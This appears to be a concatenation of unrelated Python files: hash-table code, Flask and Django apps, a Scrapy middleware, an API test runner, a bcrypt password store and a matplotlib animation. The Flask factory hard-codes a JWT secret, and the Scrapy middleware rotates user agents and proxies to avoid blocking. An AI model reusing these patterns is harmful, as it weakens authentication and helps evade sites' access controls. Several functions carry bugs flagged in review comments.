    """Simple record pairing an atom's name with its atomic weight.

    A name of None marks an empty hash-table slot (see Hashtabell.__init__).
    """

    def __init__(self, name, weight):
        self.weight = weight
        self.name = name
class Hashtabell():
    """Hash table of Atom objects; collisions spill into a nested Hashtabell
    whose slots are filled via a second hash function plus linear probing."""
    def __init__(self, length):
        # Double the requested length so the table keeps ~50% free slots.
        self.length=length*2
        self.hash_table=[]
        # NOTE(review): used_indexes is never written or read afterwards.
        self.used_indexes = []
        for i in range (0,self.length): # the table must keep 50% slack
            self.hash_table.append(Atom(None,None))
    def put(self, key, atom):
        """Insert atom under key; on collision, replace the slot with a nested
        table holding both the old and the new atom."""
        index = hashing(key, self.length)
        state = self.index_value_type(index)
        if state == "Empty":
            self.hash_table[index] = atom
        elif state == "Occupied": # Create
            old_atom = self.hash_table[index]
            new_hash_table = Hashtabell(self.length) # Create new hashtable
            new_hash_table.put2(old_atom.name, old_atom) # put Old atom in new hashtable
            new_hash_table.put2(atom.name, atom) # put New atom in new hashtable
            self.hash_table[index] = new_hash_table # insert new hashtable in the old location of Old atom
        elif state == "Hashtable":
            self.hash_table[index].put2(atom.name, atom)
        else:
            print("ERROR! PUT")
    # Put function used when atom colission occurs to put into the other hashtable
    def put2(self, key, atom):
        index = hashing_2(key, self.length)
        state = self.index_value_type(index)
        if state == "Empty":
            self.hash_table[index] = atom
        else: # Linear probing, in case colission occurs in the other hashtable
            self.linear_probe(atom, index)
    # Returns an index value which is not occupied
    def linear_probe(self, atom, index):
        """Walk forward (with wrap-around) until a free slot is found."""
        for i in range(1, self.length):
            index += 1
            # NOTE(review): index_value_type is called before the wrap check
            # below, and the check uses `>` rather than `>=`, so index can
            # equal self.length here and raise IndexError -- confirm and fix.
            state = self.index_value_type(index)
            if index > self.length:
                index = index - self.length
            if state == "Empty":
                self.hash_table[index] = atom
                break
            if i == self.length:
                print("RAN OUT OF INDEXES")
    # Returns the type of value which is located at the index
    def index_value_type(self, index):
        """Classify the slot at index: "Empty", "Occupied" or "Hashtable"."""
        something = self.hash_table[index]
        if is_atom(something):
            atom = something
            if atom.name == None:
                return "Empty"
            if atom.name != None:
                return "Occupied"
            else:
                print("ERROR ISEMPTY")
        elif is_hashtable_object(something):
            return "Hashtable"
        else:
            print("ERROR TYPE ")
            print(something)
    def get(self, atom_name):
        """Look up an Atom by name; raises KeyError when absent."""
        index = hashing(atom_name, self.length)
        something = self.hash_table[index]
        if is_atom(something):
            atom = something
            if atom.name == atom_name:
                return atom
            else:
                raise KeyError
        elif is_hashtable_object(something):
            new_hash_table_object = something
            index = hashing_2(atom_name, new_hash_table_object.length)
            # Probe the nested table, mirroring linear_probe's forward walk.
            # NOTE(review): the `break` after `raise KeyError` is unreachable,
            # and index += 1 never wraps, so this can run past the end of the
            # nested table -- confirm and fix.
            for i in range(0,self.length):
                some_atom = new_hash_table_object.hash_table[index]
                if some_atom.name == None:
                    raise KeyError
                    break
                if some_atom.name == atom_name:
                    atom = some_atom
                    return atom
                index += 1
        else:
            print("ERROR GET")
# converts strings to ascii number strings
def string_to_ascii(in_string):
    """Return a list holding the decimal ASCII code (as a str) of each character."""
    return [str(ord(ch)) for ch in in_string]
# returns index value
def hashing(in_value, hash_table_length, tweak_factor = 1):
    """Hash a string key to an index in [0, hash_table_length).

    The key's characters are converted to their decimal ASCII codes and
    concatenated into one integer; tweak_factor repeats the second code's
    digits (string repetition) so that hashing and hashing_2 disagree.
    """
    ascii_list = string_to_ascii(in_value)
    if len(ascii_list) == 1:
        ascii_value = int(ascii_list[0])
    else:
        # Deliberate *string* repetition: '65' * 3 -> '656565'.
        ascii_list[1] = ascii_list[1]*tweak_factor
        ascii_value = int("".join(ascii_list))
    # BUG FIX: the original only reduced when ascii_value > hash_table_length,
    # so ascii_value == hash_table_length was returned unreduced and indexed
    # one past the end of the table. Modulo covers every case and leaves all
    # smaller values unchanged.
    return ascii_value % hash_table_length
# 2nd hashing function used for the 2nd degree hashtables
def hashing_2(in_value, hash_table_length):
    """Second-level hash: the same algorithm as hashing(), with tweak_factor 3."""
    return hashing(in_value, hash_table_length, tweak_factor=3)
# Checks if a value is a atom objct
def is_atom(something):
    """Return True when *something* duck-types as an Atom (has name and weight)."""
    # hasattr replaces the original bare try/except, which would also have
    # swallowed KeyboardInterrupt/SystemExit.
    return hasattr(something, "name") and hasattr(something, "weight")
# Checks if a value is a hashtable objct
def is_hashtable_object(something):
    """Return True when *something* duck-types as a Hashtabell
    (has length and hash_table attributes)."""
    # hasattr replaces the original bare try/except, which would also have
    # swallowed KeyboardInterrupt/SystemExit.
    return hasattr(something, "length") and hasattr(something, "hash_table")
|
996,145 | 501eade2ad1dfc20040256e715a7db11e45632e2 | #coding:utf-8
# Python 2 demo script: connect to a local PostgreSQL instance and exercise a
# throwaway table. reload()/setdefaultencoding only exist on Python 2.
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import urllib2
import psycopg2
# url = 'http://stock.finance.sina.com.cn/fundInfo/api/openapi.php/CaihuiFundInfoService.getNav?symbol=003803&page=2'
conn = psycopg2.connect("dbname=postgres user=postgres")
cur = conn.cursor()
# NOTE(review): fails with DuplicateTable on a second run; no IF NOT EXISTS.
cur.execute("CREATE TABLE test (id serial PRIMARY KEY, num integer, data varchar);")
# Parameterized insert -- values are passed separately, not string-formatted.
cur.execute("INSERT INTO test (num, data) VALUES (%s, %s)" , (100, "abcdef"))
cur.execute("SELECT * FROM test;")
print cur.fetchone()
conn.commit()
cur.close()
conn.close()
996,146 | 2a834482daf86456d368a8470646fb2f9cce5d92 | l1=[5,20,15,20,25,50,20]
# Keep every element of l1 that is not 20.
l2 = [item for item in l1 if item != 20]
l3 = []
print(l2)
996,147 | 1b2f78a6e0985a5f41eb8e6b1640c0f864be0133 | # -*- coding: utf-8 -*-
import random
import base64
import time,urllib,json
from redis import Redis
#from settings import PROXIES
class RandomUserAgent(object):
    """Randomly rotate user agents based on a list of predefined ones"""

    def __init__(self, agents):
        self.agents = agents

    @classmethod
    def from_crawler(cls, crawler):
        # Pull the agent pool from the scrapy settings.
        return cls(crawler.settings.getlist('USER_AGENTS'))

    def process_request(self, request, spider):
        # Pick one agent at random; setdefault leaves an existing header alone.
        chosen = random.choice(self.agents)
        request.headers.setdefault('User-Agent', chosen)
class ProxyMiddleware(object):
    """Scrapy downloader middleware: route each request through a random proxy
    drawn from a Redis-backed pool."""
    def process_request(self, request, spider):
        # NOTE(review): a new Redis connection is opened per request -- confirm
        # this is intended; the host/port are hard-coded.
        r = Redis(host='192.168.6.4',port=6379)
        # srandmember returns a list; take its single element.
        proxy = r.srandmember("GZYF_Test:Proxy_Pool",1)[0]
        #print "**************ProxyMiddleware no pass************ %s"%(proxy)
        request.meta['proxy'] = "http://%s" % (proxy)
|
996,148 | 599be2b22dce3cc8dcc8962020b8dbd1645f6660 | from flask import Flask
from config import app_config
from flask_jwt_extended import JWTManager
from .db import create_tables
def create_app(config_name):
    """ creates a flask instance according to config passed """
    app = Flask(__name__)
    app.config.from_object(app_config[config_name])
    # versions of api -- imported here to avoid a circular import at module load.
    from app.api.v2 import version2 as v2
    app.register_blueprint(v2)
    # registered JWT manager
    # NOTE(review/security): the JWT secret is hard-coded in source; it should
    # come from configuration/environment instead.
    app.config['JWT_SECRET_KEY'] = 'owezzy'
    jwt = JWTManager(app)
    create_tables()
    return app
|
996,149 | 08f60e7c32d4ebf478eea0faebdd09007809a2d4 | from django.db import models
import datetime
from django.utils import timezone
# Create your models here.
class Category(models.Model):
    """A shop category (e.g. a cuisine or store type)."""
    # Display name of the category.
    category_name = models.CharField(max_length=20)
    def __str__(self):
        return self.category_name
class Shop(models.Model):
    """A shop belonging to exactly one Category; deleted with its category."""
    category = models.ForeignKey(Category, on_delete=models.CASCADE)
    shop_name = models.CharField(max_length=200)
    explanation = models.CharField(max_length=200)
    def __str__(self):
        return self.shop_name
    def shop_explanation(self):
        # Convenience accessor for templates/admin.
        return self.explanation
class Review(models.Model):
    """A dated, scored comment attached to a Shop."""
    # NOTE(review): the field is a FK to Shop, so "name" is a misleading name;
    # renaming would require a migration.
    name = models.ForeignKey(Shop, on_delete=models.CASCADE)
    review_date = models.DateTimeField('date published')
    score = models.IntegerField(default=0)
    comment = models.CharField(max_length=200)
    def __str__(self):
        return self.comment
    def shop_score(self):
        # Convenience accessor for templates/admin.
        return self.score
996,150 | 50cf72c894426fa63405649aa0801bb2db91e60a | from flask import render_template, Flask
from util import findroot
import os
# Resolve the project root and derive the static/template directories from it,
# because this module lives below the package root.
RPATH = findroot()
SPATH = os.path.join( RPATH, 'static' )
TPATH = os.path.join( RPATH, 'app', 'invre', 'templates' )
# Startup diagnostics for the resolved paths.
print( RPATH )
print( SPATH )
print( TPATH )
Wine = Flask(
    __name__,
    template_folder = TPATH,
    static_folder = SPATH,
    instance_relative_config = True
)
@Wine.route( '/' )
def landing():
    """Serve the landing page."""
    return render_template( 'index.html' )
996,151 | 8399f58f6fe4a128f89bc18c3eec6877d7731851 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 27 12:44:45 2020
@author: corkep
"""
#matplotlib inline
# line.set_data()
# text.set_position()
# quiver.set_offsets(), quiver.set_UVC()
# FancyArrow.set_xy()
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import animation
import spatialmath.base as tr
import numpy as np
import math
class Animate:
    """Animates a set of matplotlib 3D artists (lines, quivers, text) under a
    time-varying homogeneous transform. Acts as a drop-in axes-like target for
    spatialmath's trplot() via the wrapper methods at the bottom."""
    def __init__(self, axes=None, dims=None, projection='ortho', labels=['X', 'Y', 'Z'], **kwargs):
        # Artists registered by plot()/quiver()/text(); each knows how to
        # redraw itself for a given transform T.
        self.displaylist = []
        if axes is None:
            # create an axes
            fig = plt.gcf()
            if fig.axes == []:
                # no axes in the figure, create a 3D axes
                axes = fig.add_subplot(111, projection='3d', proj_type=projection)
                axes.set_xlabel(labels[0])
                axes.set_ylabel(labels[1])
                axes.set_zlabel(labels[2])
                axes.autoscale(enable=True, axis='both')
            else:
                # reuse an existing axis
                axes = plt.gca()
        if dims is not None:
            # A 2-element dims is replicated to all three axes.
            if len(dims) == 2:
                dims = dims * 3
            axes.set_xlim(dims[0:2])
            axes.set_ylim(dims[2:4])
            axes.set_zlim(dims[4:6])
            #ax.set_aspect('equal')
        self.ax = axes
        #set flag for 2d or 3d axes, flag errors on the methods called later
    def draw(self, T):
        """Redraw every registered artist under homogeneous transform T."""
        for x in self.displaylist:
            x.draw(T)
    def run(self, movie=None, axes=None, repeat=True, interval=50, nframes=100, **kwargs):
        """Run the animation; show it interactively or save it to *movie*."""
        def update(frame, a):
            # Frame parameter sweep: translate and rotate about x proportionally.
            s = frame/100.0;
            T = tr.transl(0.5*s, 0.5*s, 0.5*s) @ tr.trotx(math.pi*s)
            a.draw(T)
            return a.artists()
        # blit leaves a trail and first frame
        if movie is not None:
            repeat = False
        ani = animation.FuncAnimation(fig=plt.gcf(), func=update, frames=range(0,nframes), fargs=(self,), blit=False, interval=interval, repeat=repeat)
        if movie is None:
            plt.show()
        else:
            # Set up formatting for the movie files
            print('creating movie', movie)
            #plt.rcParams['animation.ffmpeg_path'] = '/usr/local/bin/ffmpeg'
            FFwriter=animation.FFMpegWriter(fps=10, extra_args=['-vcodec', 'libx264'])
            ani.save(movie, writer=FFwriter)
        # TODO needs conda install -c conda-forge ffmpeg
    def __repr__(self):
        return ', '.join([x.type for x in self.displaylist])
    def artists(self):
        """Return the underlying matplotlib artist handles."""
        return [x.h for x in self.displaylist]
    #------------------- plot()
    class Line:
        """Wraps a Line3D artist; stores its points in homogeneous form."""
        def __init__(self, anim, h, xs, ys, zs):
            # NOTE(review): this zip() result is never used -- dead code.
            p = zip(xs, ys, zs)
            # NOTE(review): the [1,1] homogeneous row assumes exactly two
            # points per line -- confirm for longer polylines.
            self.p = np.vstack([xs, ys, zs, [1,1]])
            self.h = h
            self.type = 'line'
            self.anim = anim
        def draw(self, T):
            p = T @ self.p
            self.h.set_data(p[0,:], p[1,:])
            self.h.set_3d_properties(p[2,:])
    def plot(self, xs, ys, zs, *args, **kwargs):
        """Plot a 3D line and register it for animation."""
        h, = self.ax.plot(xs, ys, zs, *args, **kwargs)
        self.displaylist.append(Animate.Line(self, h, xs, ys, zs))
    #------------------- quiver()
    class Quiver:
        """Wraps a 3D quiver collection; stores its segment endpoints."""
        def __init__(self, anim, h):
            self.type = 'quiver'
            self.anim = anim
            # ._segments3d is 3x2x3
            # first index: line segment in the collection
            # second index: 0 = start, 1 = end
            # third index: x, y, z components
            # https://stackoverflow.com/questions/48911643/set-uvc-equivilent-for-a-3d-quiver-plot-in-matplotlib
            # turn to homogeneous form, with columns per point
            self.p = np.vstack( [h._segments3d.reshape(6,3).T, np.ones((1,6))])
            self.h = h
            # NOTE(review): type/anim are assigned twice in this constructor;
            # 'arrow' overwrites the 'quiver' set above.
            self.type = 'arrow'
            self.anim = anim
        def draw(self, T):
            p = T @ self.p
            # reshape it back to matplotlib's (segments, endpoints, xyz) layout
            p = (p[0:3,:].T).reshape(3,2,3)
            self.h.set_segments(p)
    def quiver(self, x, y, z, u, v, w, *args, **kwargs):
        """Draw a 3-arrow quiver and register it for animation."""
        h = self.ax.quiver(x, y, z, u, v, w, *args, **kwargs)
        self.displaylist.append(Animate.Quiver(self, h))
    #------------------- text()
    class Text:
        """Wraps a Text3D artist; stores its anchor point in homogeneous form."""
        def __init__(self, anim, h, x, y, z):
            self.type = 'text'
            self.h = h
            self.p = np.r_[x, y, z, 1]
            self.anim = anim
        def draw(self, T):
            p = T @ self.p
            # x2, y2, _ = proj3d.proj_transform(p[0], p[1], p[2], self.anim.ax.get_proj())
            # self.h.set_position((x2, y2))
            self.h.set_position((p[0], p[1]))
            self.h.set_3d_properties(p[2])
    def text(self, x, y, z, *args, **kwargs):
        """Place a 3D text label and register it for animation."""
        h = self.ax.text3D(x, y, z, *args, **kwargs)
        self.displaylist.append(Animate.Text(self, h, x, y, z))
    #------------------- scatter()
    def scatter(self, **kwargs):
        # Not implemented yet; present so trplot() can call it without failing.
        pass
    #------------------- wrappers for Axes primitives
    def set_xlim(self, *args, **kwargs):
        self.ax.set_xlim(*args, **kwargs)
    def set_ylim(self, *args, **kwargs):
        self.ax.set_ylim(*args, **kwargs)
    def set_zlim(self, *args, **kwargs):
        self.ax.set_zlim(*args, **kwargs)
    def set_xlabel(self, *args, **kwargs):
        self.ax.set_xlabel(*args, **kwargs)
    def set_ylabel(self, *args, **kwargs):
        self.ax.set_ylabel(*args, **kwargs)
    def set_zlabel(self, *args, **kwargs):
        self.ax.set_zlabel(*args, **kwargs)
def tranimate(T, **kwargs):
    """Animate the coordinate frame described by transform T: draw it with
    spatialmath's trplot() into an Animate target, then run the animation."""
    anim = Animate(**kwargs)
    tr.trplot(T, axes=anim, **kwargs)
    anim.run(**kwargs)
# Demo: animate the identity frame and save it as bob.mp4 (requires ffmpeg).
tranimate( tr.transl(0,0,0), frame='A', arrow=False, dims=[0,5], movie='bob.mp4')
# a = trplot_a( tr.transl(1,2,3), frame='A', rviz=True, width=1)
# print(a)
# a.draw(tr.transl(0, 0, -1))
# trplot_a( tr.transl(3,1, 2), color='red', width=3, frame='B')
# trplot_a( tr.transl(4, 3, 1)@tr.trotx(math.pi/3), color='green', frame='c')
|
996,152 | e6bed97d9f564056675d78a45f07c180c05cdcf5 | import re
import json
from openpyxl.styles import Font, colors, Alignment
import sys
import os
sys.path.append(os.getcwd() + '\\PortCommons')
import reg_class
''''
本class完成:
调用请求类发送请求并接受响应
根据响应结果进行判断是否正确
把执行结果保存到excel
'''
class InterfaceTest:
    """Execute one API test case: send the request, validate the response
    against a regex check point, and record the outcome into an openpyxl
    worksheet row."""
    def interface_test(self, num, interface_name, method, form, full_url, data, check_point, s, i, log):
        """Run one case.

        num/interface_name -- case id and display name (for logs).
        method/form        -- HTTP method; form is "json" or "form" for POST.
        check_point        -- regex expected to match the JSON response text.
        s, i               -- worksheet object and the row to write results to.
        Returns the raw response on the normal path; returns (400, method) on a
        bad method and (2001, response_json) on a check-point mismatch.
        NOTE(review): the inconsistent return shapes are relied on by callers.
        """
        # Instantiate the HTTP request helper.
        rp = reg_class.MyRequests()
        # Dispatch on the HTTP method (and body format for POST).
        if (method.lower() == "get"):
            http_code, response, time = rp.get_requests(full_url, data)
            # print("get_requests=",response)
        elif (method.lower() == "post" and form.lower() == "json"):
            http_code, response, time = rp.post_json(full_url, data)
            # print("post_requests_json=",response)
        elif (method.lower() == "post" and form.lower() == "form"):
            http_code, response, time = rp.post_form(full_url, data)
            # print("post_requests_form=",response)
        else:
            # Unknown method: log and bail out with a sentinel tuple.
            log.error(num + " " + interface_name + ":请求方法错误,请确认[请求方法]字段是否正确!")
            return 400, method.lower()
            # print("请求方法错误,请确认[请求方法]字段是否正确!")
        # response=str(response)#re.search()是字符串的匹配,需要将返回的字典类型转换为字符串类型
        # print("response=",response)
        # print(response)
        # print(re.search("'error_code': 0",response).group())
        # print(check_point)
        # check_point=str(check_point)
        '''
        从excel获取到check_point="error_code": 0,error_code上面是双引号;而返回的response=
        {'error_code': 0, 'name': '小强软件测试疯狂讲义', 'reason': 'successed', 'price': 666}里面的'error_code': 0是单引号,导致
        re.search(check_point,response)时一直匹配不成功,所以要把从excel里获取到的error_code上的双引号替换成单引号,用re.sub()方法替换
        '''
        # check_point=re.sub('"',"'",check_point)
        # print(check_point)
        '''
        这里需要注意,咱们之前处理的都是把json类型转换成了python类型进行的
        处理完之后,为了显示效果,最后又转换成了json类型了,用的方法就是json.dumps()
        其中的参数ensure_ascii=False是为了解决中文编码
        '''
        # Re-serialize to JSON text (ensure_ascii=False keeps CJK readable) so
        # the check_point regex matches double-quoted keys as stored in Excel.
        response_json = json.dumps(response, ensure_ascii=False)
        # print("response_json=",response_json)
        if (http_code == 200):
            if (re.search(check_point, response_json)):
                # s=wb.get_sheet_by_name("TestCase")#获取TestCase工作表名的对象
                # print(i)#需要从run()传入当前循环i值
                # Pass: write status / response / elapsed time into the row.
                s.cell(row=i, column=11).value = "成功"
                s.cell(row=i, column=12).value = response_json
                s.cell(row=i, column=13).value = time
                # Success logging is currently disabled; re-enable when needed.
                # log.info(">>编号=" + num + " " + "接口名称=" + interface_name + ",成功" + " " + "http状态码=" + str(http_code) \
                # + " " + "响应时间=" + str(time) + "秒" + "\n" + "响应内容=" + response_json)
            else:
                # Check-point mismatch: mark the status cell red and log it.
                myfont = Font(color=colors.RED)
                s.cell(row=i, column=11).value = "失败"
                s.cell(row=i, column=11).font = myfont
                s.cell(row=i, column=12).value = response_json
                log.error(num + " " + interface_name + ",失败!, [ " + str(http_code) + " ], " + response_json)
                return 2001, response_json
        else:
            # Non-200 HTTP status: mark the status cell red and log it.
            myfont = Font(color=colors.RED)
            s.cell(row=i, column=11).value = "失败"
            s.cell(row=i, column=11).font = myfont
            s.cell(row=i, column=12).value = response_json
            log.error(num + " " + interface_name + ",失败!,[" + str(http_code) + " ], " + response_json)
        # Return the raw response; run_testcase uses it to extract correlated
        # parameters for later cases.
        return response
    # Note: previously the workbook was reopened (and earlier results wiped)
    # on every loop iteration; the worksheet object is now passed in instead,
    # and run() saves the workbook once after the loop, e.g.:
    # wb.save("E:\\Python_study\\work\\project\\reports\\testcase_report.xlsx")
996,153 | 7510172ab9dd4ef2448dc37287797abc96297741 | import netbox_agent.dmidecode as dmidecode
from netbox_agent.config import config
from netbox_agent.logging import logging # NOQA
from netbox_agent.vendors.dell import DellHost
from netbox_agent.vendors.generic import GenericHost
from netbox_agent.vendors.hp import HPHost
from netbox_agent.vendors.qct import QCTHost
from netbox_agent.vendors.supermicro import SupermicroHost
# Maps the DMI chassis "Manufacturer" string to the vendor-specific host class.
MANUFACTURERS = {
    'Dell Inc.': DellHost,
    'HP': HPHost,
    'HPE': HPHost,
    'Supermicro': SupermicroHost,
    'Quanta Cloud Technology Inc.': QCTHost,
    'Generic': GenericHost,
}
def run(config):
    """Detect the server vendor via DMI and register/update it in Netbox
    according to the flags on *config*. Returns True."""
    manufacturer = dmidecode.get_by_type('Chassis')[0].get('Manufacturer')
    try:
        server = MANUFACTURERS[manufacturer](dmi=dmidecode)
    except KeyError:
        # BUG FIX: the original bound the class itself (server = GenericHost),
        # so every later server.<method>() call would fail; instantiate it the
        # same way the vendor-specific branch does.
        server = GenericHost(dmi=dmidecode)
    if config.debug:
        server.print_debug()
    if config.register:
        server.netbox_create(config)
    if config.update_all or config.update_network or config.update_location or \
       config.update_inventory or config.update_psu:
        server.netbox_update(config)
    return True
def main():
    """Console entry point: run the agent with the module-level config."""
    return run(config)
if __name__ == '__main__':
    main()
|
996,154 | 4ef161653006fec18b3db89e0c988e6fa18d362a | import logging
logging.basicConfig(level=logging.DEBUG)
import sqlite3
from sqlite3 import Error
import datetime
import secrets
import bcrypt
idLength = 8
def dbConnect(dbFileName):
    """Open the SQLite database at *dbFileName* with dict-like row access."""
    connection = sqlite3.connect(dbFileName)
    connection.row_factory = sqlite3.Row
    return connection
def authenticate(dbFileName, channels):
    """Return True only if every channel dict ({"id", "password"}) matches the
    bcrypt hash stored under its id in the passwords table."""
    db = dbConnect(dbFileName)
    c = db.cursor()
    ids = [channel["id"] for channel in channels]
    # One IN query with a ?-placeholder per id (parameterized, no injection).
    c.execute('SELECT id, passwordHash FROM passwords WHERE id in ({seq})'.format(
        seq=','.join(['?']*len(ids))
    ), ids)
    rows = {};
    foundRows = c.fetchall()
    for row in foundRows:
        rows[row["id"]] = row["passwordHash"]
    success = True
    for channel in channels:
        password = channel["password"]
        # Placeholder hash for unknown ids, presumably to keep the number of
        # checkpw calls uniform; NOTE(review): bcrypt.checkpw may raise on a
        # malformed hash like ' ' -- confirm behaviour for missing ids.
        passwordHash = ' '
        if channel["id"] in rows:
            passwordHash = rows[channel["id"]]
        else:
            success = False
        # Accumulate so one failure makes the whole batch fail.
        success = success and bcrypt.checkpw(password, passwordHash)
    return success
def generateId():
    """Return idLength random bytes whose first byte is non-zero.

    A zero lead byte is rejected -- presumably reserved as a sentinel by the
    id format used here (reason not documented at this site).
    """
    while True:
        candidate = secrets.token_bytes(idLength)
        if candidate[0] != 0:
            return candidate
def createChannel(dbFileName, password):
    """Create a channel: store a bcrypt hash of *password* under a fresh random
    id in the passwords table and return that id, or None if no id could be
    inserted."""
    db = dbConnect(dbFileName)
    c = db.cursor()
    id = generateId()
    salt = bcrypt.gensalt()
    passwordHash = bcrypt.hashpw(password, salt)
    inserted = False
    # Retry with a new id on insert failure (e.g. a primary-key collision --
    # astronomically unlikely with 8 random bytes, but cheap to guard).
    for _ in range(1000000):
        try:
            c.execute('INSERT INTO passwords VALUES (?, ?)', (id, passwordHash))
            db.commit()
            inserted = True
            break
        except sqlite3.Error:
            # BUG FIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; catch only database errors.
            id = generateId()
    return id if inserted else None
def init(dbFileName):
    """Create the versions table if needed, then apply pending schema upgrades
    recorded by version number."""
    db = dbConnect(dbFileName)
    db.row_factory = sqlite3.Row
    c = db.cursor()
    try: # initialize database
        c.execute('CREATE TABLE versions (version int, date text)')
        n = datetime.datetime.now()
        c.execute('INSERT INTO versions VALUES (0, ?)', (n,))
        # save changes
        db.commit()
    except Error as e:
        # initializing may fail if it has already been initialized
        pass
    # upgrade tables if a new version is available
    # upgrading from one version to another must not fail
    # throw if an upgrade does not work
    c.execute('SELECT version FROM versions ORDER BY version DESC LIMIT 1')
    lastVersion = c.fetchone();
    # NOTE(review): the elif chain applies at most one upgrade per call; for
    # sequential migrations these should be independent `if` blocks (harmless
    # today because version 2 is still a no-op) -- confirm before changing.
    if lastVersion['version'] < 1:
        # setup tables
        c.execute('CREATE TABLE passwords (id blob PRIMARY KEY, passwordHash text NOT NULL)')
        # update version
        n = datetime.datetime.now()
        c.execute('INSERT INTO versions VALUES (1, ?)', (n,))
        # save changes
        db.commit()
    elif lastVersion['version'] < 2:
        pass # version 2 has not yet been defined
"""
dbFileName = "./tmp1.db"
initDb(dbFileName)
db = sqlite3.connect(dbFileName)
c = db.cursor()
id = secrets.token_bytes(8)
password = secrets.token_bytes(255)
#c.execute("INSERT INTO stocks VALUES (?,?)", (id,password))
id = secrets.token_bytes(8)
password = secrets.token_bytes(255)
#c.execute("INSERT INTO stocks VALUES (?,?)", (id,password))
db.commit()
c.execute("SELECT id FROM stocks")
rows = c.fetchall()
print(rows)
db.close()
""" |
996,155 | d35bf22b54da5c4a84e533b429d196145548e76f | print("Hello from Jozef Marusak")
|
996,156 | 74bb97d972536ae193d7553fcd53654ed27a0c43 | # -*- coding: cp1252 -*-
import random
import copy
import itertools
import profile
materialType = ("Naked", "Woven Lint", "Hair", "Wax", "Cotton", "Wool", "Paper", "Egg Carton", "Cardboard",
"Soft Plastic", "Rodent Pelt", "Deer Pelt", "Snake Hide", "Wolf Pelt", "Buffalo Pelt", "Leather",
"Balsa", "Bamboo", "Ivory", "Stone", "Cured Leather", "Rhino Hide", "Crocodile Hide", "Shark Hide",
"Fir Wood", "Pine Wood", "Cedar Wood", "Spruce Wood", "Tin", "Lead", "Gold", "Copper", "Silver",
"Teac Wood", "Maple", "Beechwood", "Oak", "Royal Oak", "Walnut", "Mahogany", "Rosewood", "Tamarind",
"Ironwood", "Ebony", "Hardened Plastic", "Pure Aluminium", "Duralmin", "Silumin", "Hiduminium",
"Cast Brass", "Common Brass", "Naval Brass", "High Tensile Brass", "Phosphor Bronze", "Leaded Bronze",
"Silicon Bronze", "Aluminium Bronze", "Manganese Bronze", "Pig Iron", "Grey Cast Iron",
"White Cast Iron", "Nondular Iron", "Magnesium Alloy", "Low Carbon Steel", "Mild Steel",
"Medium Carbon Steel", "High Carbon Steel", "Ultra High Carbon Steel", "Spring Steel",
"Stainless Steel", "Weathering Steel", "High Tensile Steel", "Wootz Steel", "Kevlar", "Ceramic",
"Kevlar and Ceramic", "Depleted Uranium", "Nanotube", "Starlite", "Reactive Crystal", "Nanite")
# Parallel arrays: qualityType[i] pairs with qualityMod[i] (14 entries each).
qualityType = ("Shattered", "Broken", "Bent", "Cracked", "Worn", "Poor", "Okay", "Good", "Great", "Pristine", "Splendid", "Flawless", "Radiant", "Divine")
qualityMod = ( -1.5, -1.3, -1.1, -0.9, -0.6, -0.3, -0.1, 0, 0.3, 0.5, 0.7, 0.9, 1.2, 1.5)
# Categories of craftable items.
itemType = ("Helmet", "Armour Shirt", "Armour Pants", "Shield", "Sword", "Knife", "Axe", "Sling", "Spear", "Bow", "Ward")
itemEffect = ("Tough", "Enduring", "Immortal",
"Fertile", "Verdant", "Overgrown",
"Shiny", "Glowing", "Sparkling",
"Solar", "Lunar", "Starlit", "Martian", "Shadow",
"Heated", "Flaming", "Molten",
"Sparking", "Arcing", "Thunderous",
"Chill", "Frosty", "Frigid",
"Sharp", "Keen", "Dismembering",
"Normal", "Fire", "Fighting", "Water", "Flying", "Grass", "Poison", "Electric", "Ground", "Psychic", "Rock", "Ice", "Bug", "Dragon", "Ghost", "Dark", "Steel", "Fairy",
"Gooey","Slimey","Lesser","Greater","Giant","Tiny","Oozing","Spikey","Cosmic","Melting","Smelly","Stinky","Crusty")
# first names from US census bureau (~1950) and wikipedia (~1050)
# Flat pool of given names for random character generation.  Roughly:
# male US-census names first, then female US-census names, then
# international names (Arabic, Hispanic, Hebrew, Japanese, Korean,
# Chinese, Mongolian, Turkish, etc.) toward the end.  The visible code
# treats this as one flat tuple; the ordering carries no meaning here.
# NOTE(review): several entries look truncated or garbled by the original
# scrape (e.g. "than", "Berrdo", "Wam", "ranbaatar", "Hanh", "dia") —
# confirm against the source lists before "fixing"; existing generated
# content may depend on these exact strings.
firstNames = ("James", "John", "Robert", "Michael", "William", "David", "Richard", "Charles", "Joseph", "Thomas", "Christopher", "Daniel", "Paul", "Mark", "Donald", "George", "Kenneth", "Steven", "Edward", "Brian", "Ronald", "Anthony", "Kevin", "Jason",
              "Matthew", "Gary", "Timothy", "Jose", "Larry", "Jeffrey", "Frank", "Scott", "Eric", "Stephen", "Andrew", "Raymond", "Gregory", "Joshua", "Jerry", "Dennis", "Walter", "Patrick", "Peter", "Harold", "Douglas", "Henry", "Carl", "Arthur",
              "Ryan", "Roger", "Joe", "Juan", "Jack", "Albert", "Jonathan", "Justin", "Terry", "Gerald", "Keith", "Samuel", "Willie", "Lawrence", "Ralph", "Nicholas", "Roy", "Benjamin", "Bruce", "Brandon", "Adam", "Fred", "Harry", "Wayne", "Billy",
              "Steve", "Louis", "Jeremy", "Aaron", "Randy", "Eugene", "Howard", "Carlos", "Russell", "Bobby", "Victor", "Martin", "Ernest", "Phillip", "Todd", "Jesse", "Craig", "Alan", "Shawn", "Chris", "Clarence", "Philip", "Sean", "Johnny", "Earl",
              "Jimmy", "Antonio", "Bryan", "Danny", "Tony", "Luis", "Mike", "Leonard", "Stanley", "Nathan", "Dale", "Manuel", "Curtis", "Rodney", "Norman", "Allen", "Marvin", "Vincent", "Glenn", "Jeff", "Jeffery", "Travis", "Chad", "Jacob", "Alfred",
              "Lee", "Melvin", "Francis", "Kyle", "Bradley", "Herbert", "Jesus", "Frederick", "Ray", "Joel", "Edwin", "Don", "Eddie", "Ricky", "Randall", "Troy", "Barry", "Alexander", "Bernard", "Leroy", "Mario", "Francisco", "Marcus", "Clifford",
              "Micheal", "Theodore", "Miguel", "Oscar", "Jay", "Jim", "Tom", "Alex", "Calvin", "Jon", "Ronnie", "Bill", "Derek", "Leon", "Lloyd", "Tommy", "Warren", "Darrell", "Jerome", "Floyd", "Leo", "Alvin", "Dean", "Gordon", "Greg", "Jorge", "Tim",
